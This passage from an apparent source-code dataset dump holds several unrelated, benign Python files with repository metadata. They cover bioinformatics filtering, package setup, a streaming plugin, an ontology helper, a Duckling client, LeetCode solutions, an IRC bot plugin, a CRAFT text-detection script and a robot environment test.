| 42.063882 | 117 | 0.651051 | 2,352 | 17,120 | 4.452806 | 0.108844 | 0.057768 | 0.027213 | 0.014514 | 0.675165 | 0.607849 | 0.56574 | 0.507018 | 0.498329 | 0.477227 | 0 | 0.013031 | 0.242465 | 17,120 | 406 | 118 | 42.167488 | 0.79451 | 0.141881 | 0 | 0.435252 | 0 | 0 | 0.12332 | 0.033471 | 0 | 0 | 0 | 0 | 0 | 1 | 0.05036 | false | 0 | 0.028777 | 0 | 0.100719 | 0.111511 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b5b97717666bbe9dac639046b9480144968763d | 533 | py | Python | macrel/filter_smorfs.py | celiosantosjr/macrel | b29985c282dfc4243d441f88dfc9be590a8b4fec | [
"MIT"
] | 8 | 2019-11-29T11:29:22.000Z | 2019-12-31T12:56:39.000Z | macrel/filter_smorfs.py | celiosantosjr/macrel | b29985c282dfc4243d441f88dfc9be590a8b4fec | [
"MIT"
] | null | null | null | macrel/filter_smorfs.py | celiosantosjr/macrel | b29985c282dfc4243d441f88dfc9be590a8b4fec | [
"MIT"
] | 3 | 2019-11-27T12:47:15.000Z | 2019-12-17T04:55:33.000Z | from .fasta import fasta_iter
from .utils import open_output
def filter_smorfs(ifile, ofile, uniq, full_headers=False):
'''Remove larger ORFs, leaving only smORFs behind'''
seen = set()
with open_output(ofile, mode='wt') as output:
for h,seq in fasta_iter(ifile, full_headers):
if len(seq) > 100: continue
if uniq:
if seq in seen: continue
h = 'smORF_{}'.format(len(seen))
seen.add(seq)
output.write(">{}\n{}\n".format(h,seq))
| 33.3125 | 58 | 0.58349 | 72 | 533 | 4.208333 | 0.569444 | 0.059406 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007958 | 0.292683 | 533 | 15 | 59 | 35.533333 | 0.795756 | 0.086304 | 0 | 0 | 0 | 0 | 0.039583 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | false | 0 | 0.166667 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b5b9c84e706816ce2fed253c27b0d471372eeb8 | 1,077 | py | Python | setup.py | pcjco/PyFuzzy-renamer | a8656f9d5b959a9e0d6c4e286c68e948e9cba80c | [
"MIT"
] | 2 | 2021-07-12T17:46:31.000Z | 2022-03-13T23:30:08.000Z | setup.py | pcjco/PyFuzzy-renamer | a8656f9d5b959a9e0d6c4e286c68e948e9cba80c | [
"MIT"
] | null | null | null | setup.py | pcjco/PyFuzzy-renamer | a8656f9d5b959a9e0d6c4e286c68e948e9cba80c | [
"MIT"
] | 1 | 2021-07-19T21:27:23.000Z | 2021-07-19T21:27:23.000Z | import pathlib
from setuptools import setup
README = (pathlib.Path(__file__).parent / "README.md").read_text(encoding="utf-8")
setup(
name="PyFuzzy-renamer",
version="0.2.2",
description="Uses a list of input strings and will rename each one with the most similar string from another list of strings",
long_description=README,
long_description_content_type="text/markdown",
url="https://github.com/pcjco/PyFuzzy-renamer",
author="pcjco",
author_email="pcjco@hotmail.com",
license="MIT",
classifiers=[
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
],
packages=["pyfuzzyrenamer"],
include_package_data=False,
python_requires=">=3.6",
install_requires=["wxPython>=4.1.0", "python-Levenshtein-wheels>=0.13.1", "fuzzywuzzy>=0.17.0",],
entry_points={"gui_scripts": ["pyfuzzyrenamer = pyfuzzyrenamer.__main__:main"]},
)
| 37.137931 | 130 | 0.669452 | 132 | 1,077 | 5.310606 | 0.628788 | 0.108417 | 0.142653 | 0.148359 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.027088 | 0.177344 | 1,077 | 28 | 131 | 38.464286 | 0.764108 | 0 | 0 | 0 | 0 | 0.038462 | 0.508821 | 0.056639 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.076923 | 0 | 0.076923 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b5e4de8a25563f60374824331fddc58a4af51f8 | 1,000 | py | Python | src/streamlink/plugins/reshet.py | zel4ever/streamlink | 0e48e2f01a370fa83cabc27b067b6f72cd1b8d9d | [
"BSD-2-Clause"
] | 1 | 2019-11-25T01:37:21.000Z | 2019-11-25T01:37:21.000Z | src/streamlink/plugins/reshet.py | zel4ever/streamlink | 0e48e2f01a370fa83cabc27b067b6f72cd1b8d9d | [
"BSD-2-Clause"
] | null | null | null | src/streamlink/plugins/reshet.py | zel4ever/streamlink | 0e48e2f01a370fa83cabc27b067b6f72cd1b8d9d | [
"BSD-2-Clause"
] | 1 | 2020-08-12T08:27:22.000Z | 2020-08-12T08:27:22.000Z | from __future__ import print_function
import re
from streamlink.plugin import Plugin
from streamlink.plugin.api import http
from streamlink.plugins.brightcove import BrightcovePlayer
class Reshet(Plugin):
url_re = re.compile(r"https?://(?:www\.)?reshet\.tv/(live|item/)")
video_id_re = re.compile(r'"videoID"\s*:\s*"(\d+)"')
account_id = "1551111274001"
live_channel_id = "ref:stream_reshet_live1"
@classmethod
def can_handle_url(cls, url):
return cls.url_re.match(url) is not None
def _get_streams(self):
bp = BrightcovePlayer(self.session, self.account_id)
m = self.url_re.match(self.url)
base = m and m.group(1)
if base == "live":
return bp.get_streams(self.live_channel_id)
else:
res = http.get(self.url)
m = self.video_id_re.search(res.text)
video_id = m and m.group(1)
if video_id:
return bp.get_streams(video_id)
__plugin__ = Reshet
| 28.571429 | 70 | 0.644 | 141 | 1,000 | 4.333333 | 0.41844 | 0.057283 | 0.065466 | 0.03928 | 0.042553 | 0.042553 | 0 | 0 | 0 | 0 | 0 | 0.021053 | 0.24 | 1,000 | 34 | 71 | 29.411765 | 0.782895 | 0 | 0 | 0 | 0 | 0 | 0.105 | 0.088 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0.192308 | 0.038462 | 0.576923 | 0.038462 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b5f02f2b4138084c68d64e477822a03e742a7cf | 3,148 | py | Python | tools/validators/ontology_validator/yamlformat/validator/base_lib.py | richardkreid/digitalbuildings | a629c63d7d0134019637b0f6e594fa2e02c5109a | [
"Apache-2.0"
] | 1 | 2021-01-02T19:02:52.000Z | 2021-01-02T19:02:52.000Z | tools/validators/ontology_validator/yamlformat/validator/base_lib.py | richardkreid/digitalbuildings | a629c63d7d0134019637b0f6e594fa2e02c5109a | [
"Apache-2.0"
] | 1 | 2021-02-23T12:20:02.000Z | 2021-02-23T12:20:02.000Z | tools/validators/ontology_validator/yamlformat/validator/base_lib.py | richardkreid/digitalbuildings | a629c63d7d0134019637b0f6e594fa2e02c5109a | [
"Apache-2.0"
] | null | null | null | # Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Shared classes for use in objects describing ontology components.
Classes representing ontology components parsed from files should use these.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import re
import enum
import typing
# Holds the root path to the ontology and relative path to a file from the root
PathParts = typing.NamedTuple('PathParts', [('root', str),
('relative_path', str)])
GOOGLE3_REGEX = re.compile(r'^.*google3/(.*$)')
# Isolates the first segment of a typename, typically the equipment class
EQUIPMENT_CLASS_REGEX = re.compile(r'^(.*/)?([a-zA-Z]+)(_.*)*$')
GLOBAL_NAMESPACE = ''
AUTOGENERATED_TYPES = frozenset([
'AUTOGENERATED_NETWORK_DEVICE', '/AUTOGENERATED_NETWORK_DEVICE',
'HVAC/AUTOGENERATED_NETWORK_DEVICE'
])
DEPRECATED_TYPES = frozenset([
'DEPRECATED', '/DEPRECATED', 'HVAC/DEPRECATED', 'INCOMPLETE', '/INCOMPLETE',
'HVAC/INCOMPLETE'
])
class ComponentType(enum.Enum):
"""Possible component types for a folder to contain."""
SUBFIELD = 1
MULTI_STATE = 2
FIELD = 3
ENTITY_TYPE = 4
UNIT = 5
CONNECTION = 6
SUBFOLDER_NAMES = {
ComponentType.SUBFIELD: 'subfields',
ComponentType.MULTI_STATE: 'states',
ComponentType.FIELD: 'fields',
ComponentType.ENTITY_TYPE: 'entity_types',
ComponentType.UNIT: 'units',
ComponentType.CONNECTION: 'connections',
}
def HasAutogeneratedType(parent_names):
"""True if list contains an AUTOGNERATED_NETWORK_DEVICE type name.
Args:
parent_names: a list of parent names from an entity. qualified or not
"""
return AUTOGENERATED_TYPES.intersection(parent_names)
def HasDeprecatedType(parent_names):
"""True if list contains a DEPRECATED or INCOMPLETE type name.
Args:
parent_names: a list of parent names from an entity. qualified or not
"""
return DEPRECATED_TYPES.intersection(parent_names)
def GetEquipmentClass(typename):
"""Parses out the equipment class from a typename.
Args:
typename: a relative or fully qualified typename
Returns:
The equipment class string or None
"""
p_match = EQUIPMENT_CLASS_REGEX.match(typename)
if p_match:
return p_match.group(2)
return None
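# Examples (illustrative): GetEquipmentClass('HVAC/FAN_SS') -> 'FAN',
# GetEquipmentClass('FAN') -> 'FAN', GetEquipmentClass('123') -> None.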
def GetGoogle3RelativePath(path):
"""Parses out google3 local path from an absolute path.
Args:
path: a path to a directory in google3
Returns:
the relative path to google3 with no leading / or None
"""
m = GOOGLE3_REGEX.match(path)
if m is not None:
return m.group(1)
return None
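# Example (illustrative): GetGoogle3RelativePath('/build/work/google3/a/b') -> 'a/b';
# a path without a google3 segment returns None.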
| 27.614035 | 80 | 0.729987 | 414 | 3,148 | 5.429952 | 0.408213 | 0.039146 | 0.021352 | 0.014235 | 0.118327 | 0.090747 | 0.064947 | 0.064947 | 0.064947 | 0.064947 | 0 | 0.008942 | 0.182973 | 3,148 | 113 | 81 | 27.858407 | 0.865086 | 0.473634 | 0 | 0.083333 | 0 | 0 | 0.176508 | 0.073016 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | false | 0 | 0.125 | 0 | 0.479167 | 0.020833 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b6188ad699979825125f06ce7645b9100fe4bbd | 1,320 | py | Python | duckling.py | liuzl/pyduckling | 551804b76c0a45926db9b90bb273fac00712a2fd | [
"Apache-2.0"
] | 2 | 2020-07-29T02:25:52.000Z | 2020-08-05T05:05:37.000Z | duckling.py | liuzl/pyduckling | 551804b76c0a45926db9b90bb273fac00712a2fd | [
"Apache-2.0"
] | null | null | null | duckling.py | liuzl/pyduckling | 551804b76c0a45926db9b90bb273fac00712a2fd | [
"Apache-2.0"
] | null | null | null | from os import getenv
import requests
def get_duckling_url():
url = getenv("DUCKLING_URL")
if isinstance(url, str):
return url
return "http://127.0.0.1:8000/parse"
def get_duckling_locale():
locale = getenv("DUCKLING_LOCALE")
if isinstance(locale, str):
return locale
return 'zh_CN'
def get_duckling_tz():
tz = getenv("DUCKLING_TZ")
if isinstance(tz, str):
return tz
return 'Asia/Shanghai'
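# All three getters fall back to the defaults above; they can be overridden via
# environment variables, e.g. (hypothetical deployment):
#   DUCKLING_URL=http://duckling:8000/parse DUCKLING_LOCALE=en_US python your_app.py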
class Duckling(object):
def __init__(self,
locale=get_duckling_locale(),
url=get_duckling_url(),
tz=get_duckling_tz()):
self.locale = locale
self.url = url
self.tz = tz
def __call__(self, text, locale=None, tz=None):
return self.request(text, locale, tz)
def request(self, text, locale=None, tz=None):
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
ret = requests.post(self.url, headers=headers,
data={"text":text, "locale":locale or self.locale, "tz":tz or self.tz})
if ret.status_code == 200:
return ret.json()
return []
if __name__ == "__main__":
duckling = Duckling()
text = "我打算明天下午三点去清华智源中心,可能需要开车十五公里"
ret = duckling(text)
import json
print(json.dumps(ret, ensure_ascii=False))
| 26.938776 | 87 | 0.618182 | 168 | 1,320 | 4.654762 | 0.345238 | 0.084399 | 0.053708 | 0.046036 | 0.061381 | 0.061381 | 0 | 0 | 0 | 0 | 0 | 0.013265 | 0.257576 | 1,320 | 48 | 88 | 27.5 | 0.784694 | 0 | 0 | 0 | 0 | 0 | 0.132576 | 0.045455 | 0 | 0 | 0 | 0 | 0 | 1 | 0.15 | false | 0 | 0.075 | 0.025 | 0.475 | 0.025 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b689d1bbfdd9efd839323954da20d1d8cb20d22 | 3,437 | py | Python | Widen/LC300_Longest_Increasing_Subsequence.py | crazywiden/Leetcode_daily_submit | 15637e260ab547022ac0c828dd196337bd8d50a3 | [
"MIT"
] | null | null | null | Widen/LC300_Longest_Increasing_Subsequence.py | crazywiden/Leetcode_daily_submit | 15637e260ab547022ac0c828dd196337bd8d50a3 | [
"MIT"
] | null | null | null | Widen/LC300_Longest_Increasing_Subsequence.py | crazywiden/Leetcode_daily_submit | 15637e260ab547022ac0c828dd196337bd8d50a3 | [
"MIT"
] | null | null | null | """
LC300 -- Longest Increasing Subsequence
Description:
Given an unsorted array of integers, find the length of longest increasing subsequence.
Example:
Input: [10,9,2,5,3,7,101,18]
Output: 4
Explanation: The longest increasing subsequence is [2,3,7,101], therefore the length is 4.
Note:
There may be more than one LIS combination, it is only necessary for you to return the length.
Your algorithm should run in O(n2) complexity.
Follow up: Could you improve it to O(n log n) time complexity?
"""
# dp
class Solution:
def lengthOfLIS(self, nums: List[int]) -> int:
if len(nums) == 0:
return 0
N = len(nums)
dp = [1 for _ in range(N)]
for i in range(1, N):
for j in range(i-1, -1, -1):
if nums[j] >= nums[i]:
continue
dp[i] = max(dp[i], dp[j] + 1)
return max(dp)
# credit to --> https://www.cnblogs.com/grandyang/p/4938187.html
# solution 1 -- dp
# time complexity -- O(N^2)
# space complexity -- O(N)
# Runtime: 1120 ms, faster than 33.91% of Python3 online submissions for Longest Increasing Subsequence.
# Memory Usage: 14 MB, less than 5.13% of Python3 online submissions for Longest Increasing Subsequence.
# dp[i] means the length of increasing subarray ends with nums[i]
# transfer formula: dp[i] = max(dp[i], dp[j] + 1) for j < i and nums[j] < nums[i]
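# Worked trace (illustrative) on nums = [10,9,2,5,3,7,101,18]:
#   dp = [1, 1, 1, 2, 2, 3, 4, 4]  ->  max(dp) = 4, matching the expected answer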
class Solution:
def lengthOfLIS(self, nums: List[int]) -> int:
n = len(nums)
if n == 0:
return 0
dp = [1 for _ in range(n)]
res = 1
for i in range(1, n):
for j in range(i):
if nums[j] < nums[i]:
dp[i] = max(dp[i], dp[j] + 1)
res = max(dp[i], res)
return res
# solution 2 -- maintain a list of sorted values, use binary search (similar to np.searchsorted()) to speed up
# time complexity -- O(nlog(n))
# space complexity -- O(N)
# Runtime: 48 ms, faster than 90.47% of Python3 online submissions for Longest Increasing Subsequence.
# Memory Usage: 13.9 MB, less than 5.13% of Python3 online submissions for Longest Increasing Subsequence.
# brilliant move:
# maintain a list: records (initialized by records[0] = nums[0])
# if nums[i] < records[0], replace records[0] with nums[i]
# if nums[i] > records[-1], append nums[i] at the back of records[-1]
# else replace records[j] with nums[i] to maintain order in records
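# Worked trace (illustrative) on nums = [10,9,2,5,3,7,101,18]:
#   records evolves as [10] -> [9] -> [2] -> [2,5] -> [2,3] -> [2,3,7]
#   -> [2,3,7,101] -> [2,3,7,18]; len(records) = 4 is the answer
#   (records is NOT itself a valid LIS; only its length is meaningful)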
class Solution:
def lengthOfLIS(self, nums: List[int]) -> int:
def binary_search(arr, left, right, val):
if left >= right:
return right
mid = int((left + right)/2)
if arr[mid] < val:
return binary_search(arr, mid+1, right, val)
elif arr[mid] > val:
return binary_search(arr, left, mid-1, val)
else:
return mid
if len(nums) == 0:
return 0
records = [nums[0]]
for i in range(1, len(nums)):
if nums[i] > records[-1]:
records.append(nums[i])
elif nums[i] <= records[0]:
records[0] = nums[i]
else:
idx = binary_search(records, 0, len(records)-1, nums[i])
if nums[i] > records[idx]:
records[idx+1] = nums[i]
else:
records[idx] = nums[i]
return len(records)
| 36.56383 | 108 | 0.573465 | 504 | 3,437 | 3.89881 | 0.287698 | 0.043257 | 0.099746 | 0.052926 | 0.386768 | 0.335878 | 0.284987 | 0.254453 | 0.234606 | 0.165903 | 0 | 0.040825 | 0.308699 | 3,437 | 93 | 109 | 36.956989 | 0.786195 | 0.471632 | 0 | 0.307692 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0 | 0 | 0.326923 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b6bc2c11d3c80329493f0946583a595a9fe30ed | 687 | py | Python | plugins/greetings.py | Rj48/ircbot | eb4db33d8942fa1affc21ca1a8cb5ce524dde7d6 | [
"MIT"
] | null | null | null | plugins/greetings.py | Rj48/ircbot | eb4db33d8942fa1affc21ca1a8cb5ce524dde7d6 | [
"MIT"
] | 3 | 2017-06-26T18:02:13.000Z | 2017-08-22T00:27:07.000Z | plugins/greetings.py | Rj48/ircbot | eb4db33d8942fa1affc21ca1a8cb5ce524dde7d6 | [
"MIT"
] | 3 | 2017-08-01T20:11:21.000Z | 2017-08-07T18:07:20.000Z | # coding=utf-8
import random
import re
builtin_phrases = [
['hi', 'hello'],
['yo', 'sup'],
['hallo', 'tag', 'moin'],
['こんにちは', 'こんちわ'],
['よ', 'やぁ', 'おっす']
]
phrases = yui.config_val("greetings", default=builtin_phrases)
def getRandomExcept(arr, ex):
    if ex not in arr:
return random.choice(arr)
idx = arr.index(ex)
arrEx = arr[:idx] + arr[idx + 1:]
return random.choice(arrEx)
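# e.g. getRandomExcept(['hi', 'hello'], 'hi') always returns 'hello', so the
# bot never parrots back the exact greeting it was sent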
@yui.event('msg_recv')
def greetings(msg, channel):
    global phrases
    lower = msg.lower()
    lower = re.sub(r'[!?. ]', '', lower)
for s in phrases:
if lower in s:
yui.send_msg(channel, getRandomExcept(s, lower))
| 20.205882 | 62 | 0.576419 | 90 | 687 | 4.344444 | 0.555556 | 0.046036 | 0.092072 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003854 | 0.244541 | 687 | 33 | 63 | 20.818182 | 0.749518 | 0.017467 | 0 | 0 | 0 | 0 | 0.093611 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.08 | false | 0 | 0.08 | 0 | 0.24 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b6c9264337d7efc8225aa77510103ab427f4a4b | 6,392 | py | Python | pipeline.py | dotrungkien3210/CRAFT_done | 03b754c93090e2ccbf951f345547b4db0e42c77d | [
"MIT"
] | null | null | null | pipeline.py | dotrungkien3210/CRAFT_done | 03b754c93090e2ccbf951f345547b4db0e42c77d | [
"MIT"
] | null | null | null | pipeline.py | dotrungkien3210/CRAFT_done | 03b754c93090e2ccbf951f345547b4db0e42c77d | [
"MIT"
] | null | null | null | import sys
import os
import time
import argparse
import torch
import torch.nn as nn
import torch.backends.cudnn as cudnn
from torch.autograd import Variable
from test import copyStateDict
from PIL import Image
import cv2
from skimage import io
import numpy as np
import craft_utils
import test
import imgproc
import file_utils
import json
import zipfile
import pandas as pd
from craft import CRAFT
from collections import OrderedDict
#from google.colab.patches import cv2_imshow
import matplotlib.pyplot as plt
def str2bool(v):
return v.lower() in ("yes", "y", "true", "t", "1")
'''
'''
#CRAFT
parser = argparse.ArgumentParser(description='CRAFT Text Detection')
parser.add_argument('--trained_model', default='weights/craft_mlt_25k.pth', type=str, help='pretrained model')
parser.add_argument('--text_threshold', default=0.7, type=float, help='text confidence threshold')
parser.add_argument('--low_text', default=0.4, type=float, help='text low-bound score')
parser.add_argument('--link_threshold', default=0.4, type=float, help='link confidence threshold')
parser.add_argument('--cpu', default=True, type=str2bool, help='Use cpu for inference')
parser.add_argument('--canvas_size', default=1280, type=int, help='image size for inference')
parser.add_argument('--mag_ratio', default=1.5, type=float, help='image magnification ratio')
parser.add_argument('--poly', default=False, action='store_true', help='enable polygon type')
parser.add_argument('--show_time', default=False, action='store_true', help='show processing time')
parser.add_argument('--test_folder', default='data', type=str, help='path to the input images')
parser.add_argument('--refine', default=True, action='store_true', help='enable link refiner')
parser.add_argument('--refiner_model', default='weights/craft_refiner_CTW1500.pth', type=str, help='pretrained refiner model')
args = parser.parse_args()
""" Lấy hết các ảnh trong floder Test """
image_list, _, _ = file_utils.get_files(args.test_folder)
image_names = []
image_paths = []
#CUSTOMISE START
start = args.test_folder
for num in range(len(image_list)):
image_names.append(os.path.relpath(image_list[num], start))
# create the output folder if it does not already exist
result_folder = 'Results'
if not os.path.isdir(result_folder):
os.mkdir(result_folder)
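# --- Illustrative helper (not part of the original script) ---
# width/height of a detected box, derived from the 4 corner points returned by
# test.test_net below; the corner order (tl, tr, br, bl) is an assumption.
def box_width_height(box):
    tl, tr, br, bl = [np.array(p, dtype=np.float32) for p in box]
    width = float(np.linalg.norm(tr - tl))
    height = float(np.linalg.norm(bl - tl))
    return width, height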
if __name__ == '__main__':
first = pd.DataFrame(columns=['0', '1', '2', '3', '4', '5', '6', '7'])
first.to_csv('data.csv', index=False)
csv_columns = ['x_top_left', 'y_top_left', 'x_top_right', 'y_top_right', 'x_bot_right', 'y_bot_right', 'x_bot_left' , 'y_bot_left']
# load net
net = CRAFT() # initialize
    print('Loading weights (' + args.trained_model + ')')
    '''
    the detection itself happens in test.py; here the pretrained weights are loaded into the model
    '''
    if args.cpu:
        net.load_state_dict(copyStateDict(torch.load(args.trained_model, map_location='cpu')))
    else:
        net.load_state_dict(copyStateDict(torch.load(args.trained_model)))
if args.cpu:
net = net.cpu()
net = torch.nn.DataParallel(net)
cudnn.benchmark = False
net.eval()
    # LinkRefiner: --refine defaults to True in this script, so the refiner
    # weights below are loaded as well; the detector weights were already loaded above
# ------------------------------------------------------------------------------------------
# ------------------------------------------------------------------------------------------
refine_net = None
if args.refine:
from refinenet import RefineNet
refine_net = RefineNet()
        print('Loading refiner weights (' + args.refiner_model + ')')
        if args.cpu:
            refine_net.load_state_dict(copyStateDict(torch.load(args.refiner_model, map_location='cpu')))
            refine_net = refine_net.cpu()
            refine_net = torch.nn.DataParallel(refine_net)
        else:
            refine_net.load_state_dict(copyStateDict(torch.load(args.refiner_model)))
refine_net.eval()
args.poly = True
# ------------------------------------------------------------------------------------------
#------------------------------------------------------------------------------------------
t = time.time()
# load data
for k, image_path in enumerate(image_list):
print("Test image {:d}/{:d}: {:s}".format(k+1, len(image_list), image_path), end='\r')
        # skimage.io.imread is used here instead of cv2.imread: the image comes
        # back in RGB channel order rather than BGR, so only the colors differ slightly;
        # why a different channel order is wanted here is not documented
image = imgproc.loadImage(image_path)
        '''test.test_net (see test.py) returns four values:
        bboxes     - the coordinates of every detected word (e.g. a 4-word phrase yields 4 boxes);
                     note each box carries 8 numbers, the 4 corner points of the rectangle
        polys      - looks like bboxes, but is produced when other weights/models are loaded;
                     polys is not needed here
        score_text - the heat map, which is also saved to the results folder
        det_scores - purpose unclear, but it does not appear to be very important'''
bboxes, polys, score_text, det_scores = test.test_net(net, image, args.text_threshold, args.link_threshold, args.low_text, args.cpu, args.poly, args, refine_net)
bbox_score={}
for box_num in range(len(bboxes)):
item = bboxes[box_num]
data = np.array([[int(item[0][0]),int(item[0][1]),int(item[1][0]),int(item[1][1]),int(item[2][0]),int(item[2][1]),int(item[3][0]),int(item[3][1])]])
csvdata = pd.DataFrame(data, columns=csv_columns)
csvdata.to_csv('data.csv',index=False,mode='a', header=False)
        '''
        at this point the text and the 4 corner coordinates of each rectangle have been detected;
        width and height are easy to derive from them if needed (see box_width_height above);
        the next step, label recognition, is handled in the deep-text repo
        '''
# save score text
filename, file_ext = os.path.splitext(os.path.basename(image_path))
        mask_file = result_folder + "/res_" + filename + '_mask.jpg'  # build the heat-map file path
        cv2.imwrite(mask_file, score_text)  # write out the heat map
file_utils.saveResult(image_path, image[:,:,::-1], polys, dirname=result_folder)
print("elapsed time : {}s".format(time.time() - t)) | 42.613333 | 169 | 0.644399 | 941 | 6,392 | 4.239107 | 0.339001 | 0.027074 | 0.051141 | 0.016044 | 0.190775 | 0.138381 | 0.091251 | 0.075708 | 0.075708 | 0.075708 | 0 | 0.010742 | 0.184449 | 6,392 | 150 | 170 | 42.613333 | 0.75446 | 0.140801 | 0 | 0.097826 | 0 | 0 | 0.166702 | 0.012428 | 0 | 0 | 0 | 0 | 0 | 1 | 0.01087 | false | 0 | 0.26087 | 0.01087 | 0.282609 | 0.043478 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b6e212a217152d50fa2b17ef97b1f59c657aa2c | 683 | py | Python | sawyer/ros/tests/test_gym_env.py | rlagywjd802/gym-sawyer | 385bbeafcccb61afb9099554f6a99b16f1f1a7c5 | [
"MIT"
] | null | null | null | sawyer/ros/tests/test_gym_env.py | rlagywjd802/gym-sawyer | 385bbeafcccb61afb9099554f6a99b16f1f1a7c5 | [
"MIT"
] | null | null | null | sawyer/ros/tests/test_gym_env.py | rlagywjd802/gym-sawyer | 385bbeafcccb61afb9099554f6a99b16f1f1a7c5 | [
"MIT"
] | null | null | null | import rospy
import numpy as np
from sawyer.ros.envs.sawyer import ToyEnv
rospy.init_node('test_gym_env')
toy_env = ToyEnv(simulated=False, control_mode='task_space')
actions = []
x = np.array([0.1, 0, 0, 1])
y = np.array([0, 0.1, 0, 1])
z = np.array([0, 0, -0.07, 1])
z_ = np.array([0, 0, +1.0, -1])
g1 = np.array([0, 0, 0, -1])
g2 = np.array([0, 0, 0, 1])
actions.append(g2)
actions.append(x)
actions.append(y)
#actions.append(z)
#actions.append(g1)
#actions.append(z_)
i = 0
while i < 3:
obs, r, done, info = toy_env.step(actions[i])
print("==============", i, "==============")
print(obs)
#print(r)
print(done)
#print(info)
i += 1
#toy_env.reset() | 21.34375 | 60 | 0.58858 | 122 | 683 | 3.213115 | 0.352459 | 0.045918 | 0.122449 | 0.114796 | 0.15051 | 0.147959 | 0.061224 | 0 | 0 | 0 | 0 | 0.06338 | 0.168375 | 683 | 32 | 61 | 21.34375 | 0.626761 | 0.127379 | 0 | 0 | 0 | 0 | 0.084602 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.136364 | 0 | 0.136364 | 0.136364 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b6fb84ee71db7efee09629b7534739a828aefb3 | 1,045 | py | Python | docker/features/libs/authhandler/oauth_handler.py | krdpk17/twitter-neo4j | bb7e62743651082726db373d118dcc90cce48532 | [
"Apache-2.0"
] | 1 | 2020-04-30T07:09:43.000Z | 2020-04-30T07:09:43.000Z | docker/features/libs/authhandler/oauth_handler.py | krdpk17/twitter-neo4j | bb7e62743651082726db373d118dcc90cce48532 | [
"Apache-2.0"
] | null | null | null | docker/features/libs/authhandler/oauth_handler.py | krdpk17/twitter-neo4j | bb7e62743651082726db373d118dcc90cce48532 | [
"Apache-2.0"
